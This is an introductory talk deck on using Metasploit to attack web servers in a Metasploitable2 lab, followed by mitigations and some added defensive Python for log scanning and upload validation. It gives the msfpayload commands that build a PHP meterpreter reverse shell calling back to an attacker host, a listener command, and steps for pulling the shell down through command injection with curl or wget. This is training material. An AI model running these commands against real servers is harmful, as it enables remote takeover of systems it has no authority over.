Dennis Maldonado @DennisMald Introduction to Metasploit: Exploiting Web Applications
Dennis Maldonado • Application Security Specialist • WhiteHat Security • Full-Time Student • University of Houston – Main Campus • Computer Information Systems Major • Twitter • @DennisMald • Website / Blog • KernelMeltdown.org
Tools • Kali Linux – Our attacker machine • Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim. • Metasploitable2 – Victim Web Server
Topic of the day Exploiting the backend server through a web application.
What’s the problem? • Reasons why hackers want to compromise the server: • Run attacks against the internal network • Use the server as a bot • Install backdoors onto the server • Reveal sensitive files/passwords • Execute any local file • Execute remote files • and more…
What’s the problem? • Vulnerabilities that are dangerous against a server • Directory Traversal • Local File Inclusion • Remote File Inclusion • Remote Code Execution • SQL Injection • Command Injection
Directory Traversal http://website.com/?page=index.php
Local File Inclusion http://website.com/?page=index.php
Remote File Inclusion http://website.com/?page=index.php
Remote Code Execution http://website.com/
SQL Injection http://website.com/user.php?id=1&Submit=Submit#
The Metasploit Project • Metasploit is an open-source framework used for security development and testing • Information gathering and fingerprinting • Exploitation/Penetration testing • Payload generation and encoding • Fuzzing • And much more…
Metasploit Interfaces • Command Line Interfaces • msfconsole • msfcli • GUI Interfaces • Metasploit Community Edition • Armitage
Metasploit Modules • Modules • Exploit – Exploitation/Proof-of-Concept code • Ruby on Rails exploit • PHP-CGI exploit • Auxiliary – Misc. modules for multiple purposes • Scanners • DDoS tools • Fingerprinting • Clients • Payloads – Code to be executed on the exploited system • System Shells • Meterpreter Shells • Post – Modules for post-exploitation tasks • Persistence • Password Stealing • Pivoting
Exploits • Active Exploits • Actively exploit a host. • Ex: Ruby on Rails XML exploit • Passive Exploits • Wait for incoming hosts, then exploit them • Ex: Java 0-days • Exploits contain payloads
Payloads • Inline (Non Staged) • Payload containing the exploit and shell code • Stable • Large size • Staged • Exploits victim, establishes connection with attacker, pulls down the payload • Meterpreter • Advanced, dynamic payload. • Extended over the network • Extensible through modules and plugins
Payloads continued • Types of connections • Bind • Local server gets started on victim machine • Attacker connects to victim • windows/x64/shell/bind_tcp • Reverse • Local server gets started on attacker machine • Victim connects to attacker • windows/x64/shell/reverse_tcp
PHP-CGI Argument Injection • CVE-2012-1823 • DoS attack • -T 10000 • Source code disclosure • -s argument • Remote Code Execution • -d argument
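As an added example (not part of the talk), a small log scanner from the defender's side that flags the request patterns behind the traversal/LFI, RFI and SQL injection slides above and the PHP-CGI argument-injection slide: the log format, indicator names and the sample log lines are constructed assumptions.

```python
# Added example (not from the slides): flag web-server log entries that match
# the request patterns behind the traversal/LFI, RFI, SQL injection and
# PHP-CGI argument injection (CVE-2012-1823) slides. Log lines are constructed.
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache combined log: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')

# Indicators checked against every decoded query-parameter value.
CHECKS = [
    ("directory-traversal", re.compile(r"\.\.[/\\]")),
    ("remote-file-inclusion", re.compile(r"^(https?|ftp|php|data):", re.I)),
    # Crude on purpose: a lone quote also fires on names like O'Brien.
    ("sql-injection", re.compile(r"(?i)('|\bunion\b|\bor\b\s+\d+=\d+|--\s*$)")),
]
# PHP-CGI: the whole query string is a CGI flag (-s, -d, -T), not key=value.
PHP_CGI_RE = re.compile(r"^-[sdT]\b")

def classify_request(path):
    """Return the sorted indicator names found in one request path."""
    url = urlsplit(path)
    found = set()
    if PHP_CGI_RE.match(unquote(url.query)):
        found.add("php-cgi-argument-injection")
    for _, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        for name, pattern in CHECKS:
            if pattern.search(value):
                found.add(name)
    return sorted(found)

def scan_log(lines):
    """Return (client, path, indicators) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status = m.groups()
        indicators = classify_request(path)
        if indicators:
            hits.append((client, path, indicators))
    return hits

# Constructed sample traffic in the style of the deck's URLs (not real data).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2013:10:00:01 +0000] "GET /?page=index.php HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Jan/2013:10:00:02 +0000] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.7 - - [10/Jan/2013:10:00:03 +0000] "GET /?page=http://203.0.113.9/x.txt HTTP/1.1" 200 77',
    '10.0.0.8 - - [10/Jan/2013:10:00:04 +0000] "GET /index.php?-s HTTP/1.1" 200 3000',
    '10.0.0.9 - - [10/Jan/2013:10:00:05 +0000] "GET /user.php?id=1%27%20OR%201=1 HTTP/1.1" 200 800',
]
```

Running `scan_log(SAMPLE_LOG)` flags the last four lines and leaves the benign `?page=index.php` request alone.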
Ruby on Rails XML Parameter Parsing Vulnerability • CVE-2013-0156 • Easy to find, easy to exploit, critical vulnerability. • Requires just one POST request containing specially crafted XML data. • Send commands through YAML objects
Unrestricted File Upload • The upload functionality allows any file type to be uploaded • Upload server-side code and check if it executes • PHP = <?php echo "Hello World!"; ?> • ASP = <% Response.Write("Hello World!") %> • JSP = <%= new java.util.Date().toString() %> • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Upload the shell and execute it
Command Injection • Allows an attacker to execute system-level commands. • Attempt a safe command • echo test • uname -a • Use msfpayload to create a shell • Use msfcli to listen for a connection from the victim • Inject curl or wget commands to download the shell onto the victim machine. • chmod if necessary and execute
Commands used (Note: IP addresses and ports may be different) • msfpayload php/meterpreter/reverse_tcp O • msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O • msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php • # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file. • ================================== • msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
Mitigations • Keep software up to date! • PHP: 5.4.3, 5.3.13 • Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15 • Use whitelisting for file upload extensions • Watch for extensions and content-types • Don’t let the upload directory be executable • Rename files if possible • Don’t pass user input as a system command! • Use library calls when possible • Sanitize input
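The upload and command-injection mitigations on this slide, written out as an added Python example (not code from the talk); the allowed file types, the magic-byte table and the "ping a host" use case are assumptions chosen for illustration.

```python
# Added example (not from the slides): the upload and command-injection
# mitigations from the Mitigations slide as Python helpers. The allowed types
# and the "ping a host" use case are assumptions, not from the talk.
import re
import secrets
import subprocess

ALLOWED = {"png": "image/png", "jpg": "image/jpeg", "pdf": "application/pdf"}
# Leading bytes per type: the declared Content-Type is attacker-controlled,
# so the file contents are checked as well.
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "pdf": b"%PDF-"}

def validate_upload(filename, content_type, data):
    """Whitelist the extension, check content-type and file header, and
    return a random replacement filename. Raises ValueError otherwise."""
    # Only the final extension counts, lower-cased: "shell.php.jpg" is treated
    # as a jpg by name and then rejected unless its bytes really are a JPEG.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        raise ValueError("extension not in whitelist")
    if content_type != ALLOWED[ext]:
        raise ValueError("content-type does not match extension")
    if not data.startswith(MAGIC[ext]):
        raise ValueError("file header does not match extension")
    # Drop the user-supplied name entirely (random name, fixed extension), so
    # names like "x.php.jpg" or ".htaccess" never reach the filesystem. The
    # upload directory itself must still be non-executable.
    return f"{secrets.token_hex(16)}.{ext}"

def rejected(filename, content_type, data):
    """True when validate_upload refuses the file."""
    try:
        validate_upload(filename, content_type, data)
        return False
    except ValueError:
        return True

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

def is_safe_host(host):
    """Strict allow-list for the one value handed to a system command."""
    return bool(HOSTNAME_RE.match(host)) and not host.startswith("-")

def ping_command(host):
    """argv for ping; never a shell string, so ';', '|' and '$()' are inert."""
    if not is_safe_host(host):
        raise ValueError("invalid hostname")
    return ["ping", "-c", "1", host]

def ping(host):  # no shell=True, no string concatenation: the list form is the library call
    return subprocess.run(ping_command(host), capture_output=True, timeout=10).returncode
```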
Sources • BackTrack-Linux • http://www.kali.org/ • The Metasploit Project • http://www.metasploit.com/ • Metasploit Unleashed • http://www.offensive-security.com/metasploit-unleashed/ • PHP-CGI Advisory • http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ • Ruby on Rails Exploitation • https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 • Damn Vulnerable Web Application (DVWA) • http://www.dvwa.co.uk/ • Metasploitable 2 • http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web